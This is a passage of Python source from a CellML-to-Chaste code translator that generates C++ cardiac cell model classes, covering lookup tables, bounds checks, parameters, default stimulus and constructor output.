candidates = doc.lookup_tables[:]
doc.lookup_tables = []
listed = set()
for expr in candidates:
tid = (expr.table_index, expr.table_name)
if not tid in listed:
listed.add(tid)
doc.lookup_tables.append(expr)
# Renumber
expr.table_index = table_index_map[expr.table_index]
table_name_map[expr.table_index][expr.table_name] = unicode(doc.lookup_tables_num_per_index[expr.table_index])
expr.table_name = table_name_map[expr.table_index][expr.table_name]
# Increment count for this index variable
doc.lookup_tables_num_per_index[expr.table_index] += 1
else:
# Just renumber to match the new id for this expression
expr.table_index = table_index_map[expr.table_index]
expr.table_name = table_name_map[expr.table_index][expr.table_name]
return
def lut_access_code(self, table_index, table_name, i):
"""Get the code for accessing the i'th element of the given table.
"""
return '_lookup_table_%s[%s][%s]' % (table_index, i, table_name)
def lut_parameters(self, key):
"""Get the bounds and step size for a particular table.
key should be a key into self.lookup_table_indices.
Returns (min, max, step, step_inverse) suitable for putting in generated code.
"""
return key[0:3] + [unicode(1 / float(key[2]))]
def lut_size_calculation(self, min, max, step):
"""Return the equivalent of '1 + (unsigned)((max-min)/step+0.5)'."""
return '1 + (unsigned)((%s-%s)/%s+0.5)' % (max, min, step)
def output_lut_generation(self, only_index=None):
"""Output code to generate lookup tables.
There should be a list of suitable expressions available as self.doc.lookup_tables,
to save having to search the whole model.
If only_index is given, only generate tables using the given table index key.
"""
# Don't use table lookups to generate the tables!
self.use_lookup_tables = False
# Allocate memory for tables
for key, idx in self.doc.lookup_table_indexes.iteritems():
if only_index is None or only_index == idx:
min, max, step, _ = self.lut_parameters(key)
self.writeln(self.TYPE_CONST_UNSIGNED, '_table_size_', idx, self.EQ_ASSIGN,
self.lut_size_calculation(min, max, step), self.STMT_END)
self.writeln('_lookup_table_', idx, self.EQ_ASSIGN, 'new double[_table_size_', idx,
'][', self.doc.lookup_tables_num_per_index[idx], ']', self.STMT_END)
# Generate each table in a separate loop
for expr in self.doc.lookup_tables:
var = expr.component.get_variable_by_name(expr.var)
key = (expr.min, expr.max, expr.step, var.get_source_variable(recurse=True))
idx = self.doc.lookup_table_indexes[key]
if only_index is not None and only_index != idx:
continue
min, max, step, _ = self.lut_parameters(key)
j = expr.table_name
self.writeln('for (unsigned i=0 ; i<_table_size_', idx, '; i++)')
self.open_block()
self.writeln(self.TYPE_CONST_DOUBLE, self.code_name(var), self.EQ_ASSIGN, min,
' + i*', step, self.STMT_END)
self.writeln(self.lut_access_code(idx, j, 'i'), self.EQ_ASSIGN, nl=False)
self.output_expr(expr, False)
self.writeln(self.STMT_END, indent=False)
self.close_block()
self.use_lookup_tables = True
def output_lut_deletion(self, only_index=None):
"""Output code to delete memory allocated for lookup tables."""
for idx in self.doc.lookup_table_indexes.itervalues():
if only_index is None or only_index == idx:
self.writeln('if (_lookup_table_', idx, ')')
self.open_block()
self.writeln('delete[] _lookup_table_', idx, self.STMT_END)
self.writeln('_lookup_table_', idx, self.EQ_ASSIGN, 'NULL', self.STMT_END)
self.close_block(blank_line=False)
def output_lut_declarations(self):
"""Output declarations for the lookup tables."""
self.output_comment('Lookup tables')
# Allocate memory, per index variable for cache efficiency
for idx in self.doc.lookup_table_indexes.itervalues():
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln(self.TYPE_DOUBLE, '(*_lookup_table_', idx, ')[', num_tables, ']', self.STMT_END)
self.writeln()
def output_lut_index_declarations(self, idx):
"""Output declarations the variables used to index this table."""
self.writeln('unsigned _table_index_', idx, self.STMT_END)
factor = self.lut_factor(idx, include_type=True)
if factor:
self.writeln(factor, self.STMT_END)
if self.row_lookup_method:
self.writeln('double* _lt_', idx, '_row', self.STMT_END)
def output_lut_indices(self):
"""Output declarations for the lookup table indices."""
self.output_comment('Lookup table indices')
for idx in self.doc.lookup_table_indexes.itervalues():
self.output_lut_index_declarations(idx)
self.writeln()
def output_lut_methods(self):
"""Output the methods which look up values from lookup tables."""
if self.row_lookup_method:
self.output_lut_row_lookup_methods()
return
self.output_comment('Methods to look up values from lookup tables')
self.output_comment('using ', self.config.options.lookup_type)
for expr in self.doc.lookup_tables:
j = expr.table_name
idx = expr.table_index
self.writeln('inline double _lookup_', j, '(unsigned i',
self.lut_factor('', include_type=True, include_comma=True), ')')
self.open_block()
self.output_single_lookup(idx, j, 'return ')
self.close_block()
self.writeln()
return
def output_single_lookup(self, tidx, tname, result):
"""Write the lookup calculation for a single entry.
Used by output_lut_row_lookup_methods and output_lut_methods.
"""
self.writeln(self.TYPE_CONST_DOUBLE, 'y1', self.EQ_ASSIGN,
self.lut_access_code(tidx, tname, 'i'), self.STMT_END)
if self.config.options.lookup_type == 'linear-interpolation':
self.writeln(self.TYPE_CONST_DOUBLE, 'y2', self.EQ_ASSIGN,
self.lut_access_code(tidx, tname, 'i+1'), self.STMT_END)
self.writeln(result, 'y1 + (y2-y1)*', self.lut_factor(''), self.STMT_END)
else:
self.writeln(result, 'y1', self.STMT_END)
def output_lut_row_lookup_methods(self):
"""Write methods that return a whole row of a lookup table.
Note: assumes that table names are numbered sequentially from 0.
"""
self.output_comment('Row lookup methods')
self.output_comment('using ', self.config.options.lookup_type)
for key, idx in self.doc.lookup_table_indexes.iteritems():
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln('double* _lookup_', idx, '_row(unsigned i',
self.lut_factor('', include_type=True, include_comma=True), ')')
self.open_block()
self.writeln('for (unsigned j=0; j<', num_tables, '; j++)')
self.open_block()
self.output_single_lookup(idx, 'j', '_lookup_table_%s_row[j] = ' % idx)
self.close_block(False)
self.writeln('return _lookup_table_', idx, '_row;')
self.close_block()
self.writeln()
return
def output_lut_row_lookup_memory(self):
"""Output declarations for the memory used by the row lookup methods."""
self.output_comment('Row lookup methods memory')
for key, idx in self.doc.lookup_table_indexes.iteritems():
min, max, step, var = key
num_tables = unicode(self.doc.lookup_tables_num_per_index[idx])
self.writeln('double _lookup_table_', idx, '_row[', num_tables, '];')
self.writeln()
return
def is_lookup_table(self, expr):
"""Return True iff expr can be replaced by a lookup table.
Uses annotations from a previous analysis."""
return expr.getAttributeNS(NSS['lut'], u'possible', '') == u'yes'
def contained_table_indices(self, node):
"""Return all lookup tables used directly in computing this node.
If this is an expression node, checks all its children for table
lookups, and returns the set of table indices used.
"""
result = set()
if isinstance(node, amara.bindery.element_base):
if self.is_lookup_table(node):
result.add(node.table_index)
else:
for child in node.xml_children:
result.update(self.contained_table_indices(child))
return result
def lut_factor(self, idx, include_comma=False, include_type=False):
"""Return code for any extra factor needed to do a table lookup.
Will return the empty string unless linear interpolation is being used.
"""
if self.config.options.lookup_type == 'linear-interpolation':
factor = '_factor_' + str(idx)
if include_type: factor = self.TYPE_DOUBLE + factor
if include_comma: factor = ', ' + factor
else:
factor = ''
return factor
def output_table_lookup(self, expr, paren):
"""Output code to look up expr in the appropriate table."""
i = expr.table_index
if self.row_lookup_method:
self.write('_lt_', i, '_row[', expr.table_name, ']')
else:
self.write(self.lookup_method_prefix, '_lookup_', expr.table_name,
'(_table_index_', i, self.lut_factor(i, include_comma=True), ')')
return
def output_table_index_generation(self, time_name, nodeset=set()):
"""Output code to calculate indexes into any lookup tables.
If time_name is given and table bounds are being checked, the time value will be included in the
error message. Note that we need to pass it in, since in some contexts the free variable is not
defined.
If nodeset is given, then filter the table indices calculated so
that only those needed to compute the nodes in nodeset are defined.
A nodeset is required if any table indices are computed variables rather than state variables.
In this case, we use the equations within nodeset to calculate the values of the indices, and
return a set containing just those nodes used, so we can avoid recalculating them later.
"""
tables_to_index = set()
nodes_used = set()
for node in nodeset:
tables_to_index.update(self.contained_table_indices(node))
if tables_to_index or not nodeset:
self.output_comment('Lookup table indexing')
for key, idx in self.doc.lookup_table_indexes.iteritems():
if not nodeset or idx in tables_to_index:
var = key[-1]
if var.get_type() is VarTypes.Computed:
if not nodeset:
raise TranslationError('Unable to generate lookup table indexed on', var, 'as it is a computed variable')
var_nodes = self.calculate_extended_dependencies([var]) & nodeset
self.output_equations(var_nodes)
nodes_used.update(var_nodes)
self.output_table_index_checking(key, idx)
if self.config.options.check_lt_bounds:
self.writeln('#define COVERAGE_IGNORE', indent=False)
self.writeln('if (_oob_', idx, ')')
if time_name is None:
dump_state_args = 'rY'
else:
dump_state_args = 'rY, ' + time_name
self.writeln('EXCEPTION(DumpState("', self.var_display_name(key[-1]),
' outside lookup table range", ', dump_state_args,'));', indent_offset=1)
self.writeln('#undef COVERAGE_IGNORE', indent=False)
self.output_table_index_generation_code(key, idx)
self.writeln()
return nodes_used
def output_table_index_checking(self, key, idx):
"""Check whether a table index is out of bounds."""
if self.config.options.check_lt_bounds:
var = key[-1]
min, max, _, _ = self.lut_parameters(key)
varname = self.code_name(var)
self.writeln('bool _oob_', idx, self.EQ_ASSIGN, 'false', self.STMT_END)
self.writeln('if (', varname, '>', max, ' || ', varname, '<', min, ')')
self.open_block()
self.writeln('#define COVERAGE_IGNORE', indent=False)
if self.constrain_table_indices:
self.writeln('if (', varname, '>', max, ') ', varname, self.EQ_ASSIGN, max, self.STMT_END)
self.writeln('else ', varname, self.EQ_ASSIGN, min, self.STMT_END)
else:
self.writeln('_oob_', idx, self.EQ_ASSIGN, 'true', self.STMT_END)
self.writeln('#undef COVERAGE_IGNORE', indent=False)
self.close_block(blank_line=False)
def output_table_index_generation_code(self, key, idx):
"""Method called by output_table_index_generation to output the code for a single table."""
index_type = 'const unsigned '
factor_type = 'const double '
row_type = 'const double* const '
var = key[-1]
min, max, _, step_inverse = self.lut_parameters(key)
offset = '_offset_' + idx
offset_over_step = offset + '_over_table_step'
varname = self.code_name(var)
self.writeln(self.TYPE_CONST_DOUBLE, offset, self.EQ_ASSIGN, varname, ' - ', min, self.STMT_END)
self.writeln(self.TYPE_CONST_DOUBLE, offset_over_step, self.EQ_ASSIGN,
offset, ' * ', step_inverse, self.STMT_END)
idx_var = '_table_index_' + str(idx)
if self.config.options.lookup_type == 'nearest-neighbour':
if self.lt_index_uses_floor:
self.writeln(index_type, idx_var, ' = (unsigned) round(', offset_over_step, ');')
else:
self.writeln(index_type, idx_var, ' = (unsigned) (', offset_over_step, '+0.5);')
else:
if self.lt_index_uses_floor:
self.writeln(index_type, idx_var, ' = (unsigned) floor(', offset_over_step, ');')
else:
self.writeln(index_type, idx_var, ' = (unsigned)(', offset_over_step, ');')
factor = self.lut_factor(idx)
if factor:
self.writeln(factor_type, factor, ' = ', offset_over_step, ' - ', idx_var, self.STMT_END)
if self.row_lookup_method:
self.writeln(row_type, '_lt_', idx, '_row = ', self.lookup_method_prefix, '_lookup_', idx,
'_row(', idx_var, self.lut_factor(idx, include_comma=True), ');')
class CellMLToChasteTranslator(CellMLTranslator):
"""
As CellMLTranslator, but targets more recent Chaste style.
Includes the ability to output a cell that can solve itself using
backward Euler, if the appropriate analyses have been done on the
model. (See the -J and -j options to translate.py.)
"""
# We want separate .cpp/.hpp files
USES_SUBSIDIARY_FILE = True
# Type of (a reference to) the state variable vector
TYPE_VECTOR = 'std::vector<double> '
TYPE_VECTOR_REF = 'std::vector<double>& '
def writeln_hpp(self, *args, **kwargs):
"""Convenience wrapper for writing to the header file."""
kwargs['subsidiary'] = True
self.writeln(*args, **kwargs)
def translate(self, *args, **kwargs):
"""Generate code for the given model."""
our_kwargs = {'use_chaste_stimulus': False,
'separate_lut_class': True,
'convert_interfaces': False,
'use_modifiers': False,
'use_data_clamp': False,
'dynamically_loadable': False,
'use_protocol': False
}
for key, default in our_kwargs.iteritems():
setattr(self, key, kwargs.get(key, default))
if key in kwargs:
del kwargs[key]
# Some other default settings
self.use_backward_euler = False
self.include_serialization = False
# Last method's access specification
self._last_method_access = 'private'
return super(CellMLToChasteTranslator, self).translate(*args, **kwargs)
def final_configuration_hook(self):
"""Set the LT method prefix (requires self.class_name to be set)."""
if self.separate_lut_class:
self.lt_class_name = self.class_name + '_LookupTables'
self.lookup_method_prefix = self.lt_class_name + '::Instance()->'
return super(CellMLToChasteTranslator, self).final_configuration_hook()
def output_includes(self, base_class=None):
"""Output the start of each output file.
As well as the #include lines, it also outputs the include guard for
the .hpp file, and doxygen comment.
If base_class is not None (and self.use_backward_euler isn't set)
then includes that class' header instead of AbstractCardiacCell.
If self.dynamically_loadable is set, includes extra headers needed
for that case.
Reads self.include_serialization and self.use_backward_euler.
Sets self.base_class_name and self.class_inheritance.
"""
self.writeln_hpp('#ifndef ', self.include_guard)
self.writeln_hpp('#define ', self.include_guard, '\n')
for sub in [False, True]:
self.output_doxygen('@file\n\n',
'This source file was generated from CellML.\n\n',
'Model: ', self.model.name, '\n\n',
version_comment(self.add_timestamp),
'\n\n<autogenerated>',
subsidiary=sub)
self.writeln(subsidiary=sub)
# .cpp should include .hpp
self.writeln('#include "', os.path.basename(self.subsidiary_filename), '"')
if self.include_serialization:
self.writeln_hpp('#include "ChasteSerialization.hpp"')
self.writeln_hpp('#include <boost/serialization/base_object.hpp>')
self.writeln('#include <cmath>')
self.writeln('#include <cassert>')
self.writeln('#include <memory>')
if self.use_backward_euler:
self.writeln_hpp('#include "AbstractBackwardEulerCardiacCell.hpp"')
self.writeln('#include "CardiacNewtonSolver.hpp"')
self.base_class_name = 'AbstractBackwardEulerCardiacCell<' + \
str(self.nonlinear_system_size) + '>'
elif self.options.rush_larsen:
self.base_class_name = 'AbstractRushLarsenCardiacCell'
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
if not self.doc._cml_rush_larsen:
self.writeln('#include "Warnings.hpp"')
elif self.options.grl1:
self.base_class_name = 'AbstractGeneralizedRushLarsenCardiacCell'
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
elif self.options.grl2: #1992 TODO: merge with above case
self.base_class_name = 'AbstractGeneralizedRushLarsenCardiacCell'
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
elif base_class:
self.base_class_name = base_class
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
else:
self.base_class_name = 'AbstractCardiacCell'
self.writeln_hpp('#include "' + self.base_class_name + '.hpp"')
if self.use_modifiers:
self.writeln_hpp('#include "AbstractCardiacCellWithModifiers.hpp"')
self.writeln_hpp('#include "AbstractModifier.hpp"')
# Modify the base class name
self.base_class_name = 'AbstractCardiacCellWithModifiers<' + self.base_class_name + ' >'
self.class_inheritance = ' : public ' + self.base_class_name
if self.dynamically_loadable:
self.writeln_hpp('#include "AbstractDynamicallyLoadableEntity.hpp"')
self.class_inheritance += ', public AbstractDynamicallyLoadableEntity'
if self.use_protocol:
self.writeln_hpp('#include "AbstractTemplatedSystemWithOutputs.hpp"')
self.class_inheritance += ', public AbstractTemplatedSystemWithOutputs<' + self.TYPE_VECTOR + '>'
self.writeln('#include "Exception.hpp"')
self.writeln('#include "OdeSystemInformation.hpp"')
self.writeln('#include "RegularStimulus.hpp"')
self.writeln_hpp('#include "AbstractStimulusFunction.hpp"')
self.writeln('#include "HeartConfig.hpp"')
self.writeln('#include "IsNan.hpp"')
self.writeln('#include "MathsCustomFunctions.hpp"')
self.writeln()
self.writeln_hpp()
def set_access(self, access):
"""Set the access specification for subsequent output.
We keep track of the last access set, either via this method or
output_method_start, and only output a new declaration to the
header file if it changes.
"""
if access != self._last_method_access:
self._last_method_access = access
self.writeln_hpp()
self.writeln_hpp(access, ':', indent_offset=-1)
def output_method_start(self, method_name, args, ret_type, access=None, defaults=[]):
"""Output the start of a method declaration/definition.
Will write to both the .hpp and .cpp file.
We keep track of the access of the last method, and only output a new
declaration to the header file if it changes. The default is to use
the same access specification as last time.
"""
DEBUG('translator', 'Generating code for method', method_name)
if access:
self.set_access(access)
if ret_type:
if ret_type[-1] != ' ':
ret_type = ret_type + ' '
else:
ret_type = ''
args_string_cpp = ', '.join(filter(None, map(str, args)))
if defaults:
assert len(defaults) == len(args)
args_with_default = []
for (arg, default) in zip(map(str, args), map(str, defaults)):
if arg:
if default:
args_with_default.append(arg + '=' + default)
else:
args_with_default.append(arg)
args_string_hpp = ', '.join(args_with_default)
else:
args_string_hpp = args_string_cpp
self.writeln_hpp(ret_type, method_name, '(', args_string_hpp, ')', self.STMT_END)
self.writeln(ret_type, self.class_name, '::', method_name, '(', args_string_cpp, ')')
def output_derived_quantities(self):
"""Output a ComputeDerivedQuantities method if any such quantities exist.
Looks for variables annotated with pycml:derived-quantity=yes, and generates
a method to compute all these variables from a given state.
"""
dqs = self.derived_quantities
if dqs:
self.output_method_start('ComputeDerivedQuantities',
[self.TYPE_DOUBLE + self.code_name(self.free_vars[0]),
'const ' + self.TYPE_VECTOR + '& rY'], # We need it to really be a reference
self.TYPE_VECTOR, access='public')
self.open_block()
self.output_comment('Inputs:')
self.output_comment('Time units: ', self.free_vars[0].units)
# Work out what equations are needed
if self.use_chaste_stimulus:
i_stim = [self.doc._cml_config.i_stim_var]
else:
i_stim = []
if self.use_data_clamp:
prune = [self.config.i_data_clamp_data]
else:
prune = []
nodeset = self.calculate_extended_dependencies(dqs, prune_deps=i_stim, prune=prune)
# State variable inputs
self.output_state_assignments(assign_rY=False, nodeset=nodeset)
self.writeln()
table_index_nodes_used = self.calculate_lookup_table_indices(nodeset, self.code_name(self.free_vars[0]))
# Output equations
self.output_comment('Mathematics')
self.output_equations(nodeset - table_index_nodes_used)
self.writeln()
# Assign to results vector
self.writeln(self.vector_create('dqs', len(dqs)))
for i, var in enumerate(dqs):
self.writeln(self.vector_index('dqs', i), self.EQ_ASSIGN, self.code_name(var), self.STMT_END)
self.writeln('return dqs', self.STMT_END)
self.close_block(blank_line=True)
def output_serialize_method(self):
"""This method outputs the boost serialize method for the
header files that need it."""
# Serialization
if self.include_serialization:
self.writeln_hpp('friend class boost::serialization::access;')
self.writeln_hpp('template<class Archive>')
self.writeln_hpp('void serialize(Archive & archive, const unsigned int version)')
self.open_block(subsidiary=True)
self.writeln_hpp('archive & boost::serialization::base_object<', self.base_class_name,
' >(*this);')
if self.dynamically_loadable:
self.writeln_hpp('archive & boost::serialization::base_object<AbstractDynamicallyLoadableEntity>(*this);')
if self.use_modifiers:
self.output_comment('Despite this class having modifier member variables, they are all added to the', subsidiary=True)
self.output_comment('abstract class by the constructor, and archived via that, instead of here.', subsidiary=True)
self.close_block(subsidiary=True)
def output_cell_parameters(self):
"""Output declarations, set & get methods for cell parameters.
Sets self.cell_parameters to be those constant variables annotated with
pycml:modifiable-parameter. These use the mParameters functionality in
Chaste.
Also collects any variables annotated with an RDF oxmeta name into
self.metadata_vars. Only constants and state variables are included.
"""
# Find annotated parameters
self.cell_parameters = filter(
lambda v: v.is_modifiable_parameter,
cellml_metadata.find_variables(self.model,
('pycml:modifiable-parameter', NSS['pycml']),
'yes'))
# Reduce intra-run variation
self.cell_parameters.sort(key=self.var_display_name)
for i, var in enumerate(self.cell_parameters):
# Remember the var's index
var._cml_param_index = i
# Create set of all oxmeta-annotated variables
vars = cellml_metadata.find_variables(self.model, ('bqbiol:is', NSS[u'bqbiol']))
# Keep only the variables with an oxmeta name
vars = filter(lambda v: v.oxmeta_name, vars)
# We're interested in anything that isn't time or the stimulus
self.metadata_vars = set([v for v in vars if v.get_type() != VarTypes.Free])
self.metadata_vars.discard(self.doc._cml_config.i_stim_var)
self.metadata_vars = list(self.metadata_vars)
self.metadata_vars.sort(key=self.var_display_name)
# #1464 Create a set of metadata variables that will have modifiers
# We want to avoid writing out metadata for stimulus current as it is used once and then discarded.
# \todo - use protocol information to put only the required modifiers into this list.
self.modifier_vars = [v for v in self.metadata_vars if v.oxmeta_name not in cellml_metadata.STIMULUS_NAMES]
self.modifier_vars.sort(key=self.var_display_name)
# Generate member variable declarations
self.set_access('private')
if self.metadata_vars:
self.output_comment('\nSettable parameters and readable variables\n', subsidiary=True)
# Write out the modifier member variables.
if self.use_modifiers:
for var in self.modifier_vars:
self.writeln_hpp('boost::shared_ptr<AbstractModifier> mp_' + var.oxmeta_name + '_modifier', self.STMT_END)
# Methods associated with oxmeta annotated variables
# Don't use LT & modifiers for the const methods
use_modifiers = self.use_modifiers
self.use_modifiers = False
use_lt = self.use_lookup_tables
self.use_lookup_tables = False
for var in self.metadata_vars:
if var.is_statically_const(ignore_annotations=True):
# self.output_method_start('Get_' + var.oxmeta_name + '_constant', [], self.TYPE_DOUBLE)
# self.open_block()
# self.output_comment('Constant value given in CellML')
# nodeset = self.calculate_extended_dependencies([var])
# self.output_equations(nodeset)
# self.writeln('return ', self.code_name(var), self.STMT_END)
# self.close_block()
# self.writeln()
if var in self.cell_parameters and var in self.modifier_vars:
# 'Forget' its index, so normal code generation occurs (#1647)
var._cml_has_modifier = True
self.use_lookup_tables = use_lt
self.use_modifiers = use_modifiers
self.output_default_stimulus()
self.output_intracellular_calcium()
# Find & store derived quantities, for use elsewhere
self.derived_quantities = cellml_metadata.find_variables(self.model,
('pycml:derived-quantity', NSS['pycml']),
'yes')
# Reduce intra-run variation
self.derived_quantities.sort(key=self.var_display_name)
def output_default_stimulus(self):
"""
Output a default cell stimulus from the metadata specification
as long as the following metadata exists:
* membrane_stimulus_current_amplitude
* membrane_stimulus_current_duration
* membrane_stimulus_current_period
and optionally:
* membrane_stimulus_current_offset
* membrane_stimulus_current_end
Ensures that the amplitude of the generated RegularStimulus is negative.
"""
vars = dict()
for n in ['duration', 'amplitude', 'period', 'offset', 'end']:
vars[n] = self.model.get_variable_by_oxmeta_name('membrane_stimulus_current_'+n, throw=False)
if not (vars['duration'] and vars['amplitude'] and vars['period']):
self.has_default_stimulus = False
return
self.has_default_stimulus = True
nodeset = self.calculate_extended_dependencies(filter(None, vars.values()))
self.output_method_start('UseCellMLDefaultStimulus', [], 'boost::shared_ptr<RegularStimulus>', 'public')
self.open_block()
self.output_comment('Use the default stimulus specified by CellML metadata')
self.output_equations(nodeset)
self.writeln('boost::shared_ptr<RegularStimulus> p_cellml_stim(new RegularStimulus(')
self.writeln(' -fabs(', self.code_name(vars['amplitude']), '),')
self.writeln(' ', self.code_name(vars['duration']), ',')
self.writeln(' ', self.code_name(vars['period']), ',')
if vars['offset']:
self.writeln(' ', self.code_name(vars['offset']))
else:
self.writeln(' 0.0')
if vars['end']:
self.writeln(' , ', self.code_name(vars['end']))
self.writeln(' ))', self.STMT_END)
self.writeln('mpIntracellularStimulus = p_cellml_stim', self.STMT_END)
self.writeln('return p_cellml_stim', self.STMT_END)
self.close_block(blank_line=True)
def output_intracellular_calcium(self):
"""
If a (state) variable has been annotated as cytosolic_calcium_concentration,
generate a GetIntracellularCalciumConcentration method.
"""
# Find cytosolic_calcium_concentration
cai = self.doc.model.get_variable_by_oxmeta_name('cytosolic_calcium_concentration', throw=False)
if cai and cai in self.state_vars:
i = self.state_vars.index(cai[0])
self.output_method_start('GetIntracellularCalciumConcentration', [], self.TYPE_DOUBLE, 'public')
self.open_block()
self.writeln('return ', self.vector_index('mStateVariables', i), self.STMT_END)
self.close_block(blank_line=True)
def code_name(self, var, *args, **kwargs):
"""
Return the full name of var in a form suitable for inclusion in a source file.
Overrides the base class version to access mParameters for parameters.
"""
if hasattr(var, '_cml_param_index') and not (self.use_modifiers and getattr(var, '_cml_has_modifier', False)):
return self.vector_index('mParameters', var._cml_param_index)
elif var is getattr(self.model, u'_cml_Chaste_Cm', None):
return 'HeartConfig::Instance()->GetCapacitance()'
elif hasattr(var, '_cml_code_name'):
return var._cml_code_name % {'time': self.code_name(self.free_vars[0])}
else:
return super(CellMLToChasteTranslator, self).code_name(var, *args, **kwargs)
def output_top_boilerplate(self):
"""Output top boilerplate.
This method outputs the constructor and destructor of the cell
class, and also lookup table declarations and lookup methods.
It also calls output_verify_state_variables.
"""
self.include_serialization = True
# Check if we're generating a Backward Euler model
self.use_backward_euler = self.model.get_option('backward_euler')
self.use_analytic_jacobian = (self.model.get_option('maple_output') and hasattr(self.model.solver_info, u'jacobian'))
if self.use_backward_euler:
assert hasattr(self.model, u'solver_info')
# Find the size of the nonlinear system
num_linear_odes = len(self.model.solver_info.xml_xpath(u'solver:linear_odes/m:math/m:apply'))
self.nonlinear_system_size = len(self.state_vars) - 1 - num_linear_odes
nonlinear_entries = self.model.solver_info.xml_xpath(u'solver:jacobian/solver:entry/@var_j')
self.nonlinear_system_vars = map(self.varobj, nonlinear_entries[:self.nonlinear_system_size])
# Start output
self.output_includes()
if self.use_backward_euler or self.options.rush_larsen or self.options.grl1 or self.options.grl2:
# Keep the same signature as forward cell models, but note that the solver isn't used
solver1 = 'boost::shared_ptr<AbstractIvpOdeSolver> /* unused; should be empty */'
solver2 = ''
#solver1 = solver2 = ''
else:
solver1 = 'boost::shared_ptr<AbstractIvpOdeSolver> pSolver'
solver2 = 'pSolver'
if self.use_lookup_tables and self.separate_lut_class:
self.output_lut_class()
# Cell model class
self.writeln_hpp('class ', self.class_name, self.class_inheritance)
self.open_block(subsidiary=True)
# Put the boost serialize() method in if requested.
self.output_serialize_method()
# Parameter declarations, and set & get methods (#666)
self.output_cell_parameters()
# Constructor
self.set_access('public')
self.output_constructor([solver1, 'boost::shared_ptr<AbstractStimulusFunction> pIntracellularStimulus'],
[solver2, len(self.state_vars), self.unsigned_v_index, 'pIntracellularStimulus'])
# Destructor
self.output_method_start('~'+self.class_name, [], '')
self.open_block()
self.close_block()
# Other declarations & methods
self.output_chaste_lut_methods()
self.output_verify_state_variables()
return
@property
def unsigned_v_index(self):
if self.v_index == -1:
return 'UNSIGNED_UNSET'
else:
return str(self.v_index)
def output_verify_state_variables(self):
"""Output the VerifyStateVariables method.
This will look for state variables annotated with pycml:range-low and/or pycml:range-high,
which specify allowable ranges for these variables. The generated method will check that
they are within the range. Both limits are included, i.e. they specify a closed interval.
"""
# First work out if there are any constraints on state variables
low_prop = ('pycml:range-low', NSS['pycml'])
high_prop = ('pycml:range-high', NSS['pycml'])
low_range_vars = filter(
lambda v: v.get_type() == VarTypes.State,
cellml_metadata.find_variables(self.model, low_prop))
high_range_vars = filter(
lambda v: v.get_type() == VarTypes.State,
cellml_metadata.find_variables(self.model, high_prop))
nodeset = set(low_range_vars + high_range_vars)
# If not, don't bother writing the method, an empty implementation is in the abstract classes.
if nodeset:
self.output_method_start('VerifyStateVariables', [], 'void')
self.open_block()
using_cvode = (self.TYPE_VECTOR_REF == CellMLToCvodeTranslator.TYPE_VECTOR_REF)
if using_cvode:
self.writeln('/* We only expect CVODE to keep state variables to within its tolerances,')
self.writeln(' * not exactly the bounds prescribed to each variable that are checked here.')
self.writeln(' *')
self.writeln(' * For 99.99% of paces this->mAbsTol works,')
self.writeln(' * For 99.999% of paces 10*this->mAbsTol is fine,')
self.writeln(' * but unfortunately 100x seems to be required on rare occasions for upstrokes.')
self.writeln(' * This sounds bad, but is probably typically only 1e-5 or 1e-6.')
self.writeln(' */')
self.writeln('const double tol = 100*this->mAbsTol;')
self.output_state_assignments(nodeset=nodeset)
error_template = 'EXCEPTION(DumpState("State variable {0} has gone out of range. Check numerical parameters, for example time and space stepsizes, and/or solver tolerances"));'
additional_tolerance_adjustment = ''
for var in low_range_vars:
if using_cvode:
additional_tolerance_adjustment = ' - tol'
self.writeln('if (', self.code_name(var), ' < ', var.get_rdf_annotation(low_prop), additional_tolerance_adjustment, ')')
self.open_block()
#self.writeln('std::cout << "Too small: ', self.code_name(var), ' = " << ', self.code_name(var) , ' << std::endl << std::flush;')
self.writeln(error_template.format(self.var_display_name(var)))
self.close_block(False)
for var in high_range_vars:
if using_cvode:
additional_tolerance_adjustment = ' + tol'
self.writeln('if (', self.code_name(var), ' > ', var.get_rdf_annotation(high_prop), additional_tolerance_adjustment, ')')
self.open_block()
#self.writeln('std::cout << "Too large: ', self.code_name(var), ' = " << ', self.code_name(var) , ' << std::endl << std::flush;')
self.writeln(error_template.format(self.var_display_name(var)))
self.close_block(False)
self.close_block(True)
def output_constructor(self, params, base_class_params):
"""Output a cell constructor.
params is a list of constructor parameters, entries of which should be strings
including both type and parameter name, which will be included verbatim in the
generated code.
base_class_params is a list of parameters to be supplied to the base class
constructor. Entries will be converted to strings.
"""
self.output_method_start(self.class_name, params, '', access='public')
self.writeln(' : ', self.base_class_name, '(')
# Filter out empty params, to make backward Euler happy
base_class_params = filter(None, map(str, base_class_params))
for i, param in enumerate(base_class_params):
if i == len(base_class_params)-1: comma = ')'
else: comma = ','
self.writeln(param, comma, indent_offset=3)
self.open_block()
self.output_comment('Time units: ', self.free_vars[0].units, '\n')
self.writeln('this->mpSystemInfo = OdeSystemInformation<',
self.class_name, '>::Instance();')
if self.v_index == -1 and self.v_variable:
self.writeln('this->mVoltageIndex = GetAnyVariableIndex("',
self.var_display_name(self.v_variable), '");')
if self.config.options.include_dt_in_tables:
self.writeln(self.lt_class_name, '::Instance()->SetTimestep(mDt);')
self.writeln('Init();\n')
#1861 - Rush-Larsen
if self.options.rush_larsen and not self.doc._cml_rush_larsen:
self.writeln('WARNING("No elligible gating variables found for this Rush-Larsen cell model; using normal forward Euler.");')
#1463 - default cellML stimulus
if self.has_default_stimulus:
self.output_comment('We have a default stimulus specified in the CellML file metadata')
self.writeln('this->mHasDefaultStimulusFromCellML = true', self.STMT_END)
#1464 - cleverer modifiers...
if self.use_modifiers and self.modifier_vars:
self.output_comment('These will get initialised to DummyModifiers in the base class method.')
for var in self.modifier_vars:
self.writeln('this->AddModifier("' + var.oxmeta_name + '",')
self.writeln(' mp_' + var.oxmeta_name + '_modifier)', self.STMT_END)
#666 - initialise parameters
for var in self.cell_parameters:
if var.get_type() == VarTypes.Constant:
self.writeln(self.vector_index('this->mParameters', var._cml_param_index),
self.EQ_ASSIGN, var.initial_value, self.STMT_END, ' ',
self.COMMENT_START, var.fullname(), ' [', var.units, ']')
#1354 - specify protocol outputs
if self.use_protocol:
outputs = cellml_metadata.find_variables(self.model,
('pycml:output-variable', NSS['pycml']),
'yes')
def write_output_info(output):
if output.get_type() in [VarTypes.Free, VarTypes.Unknown]:
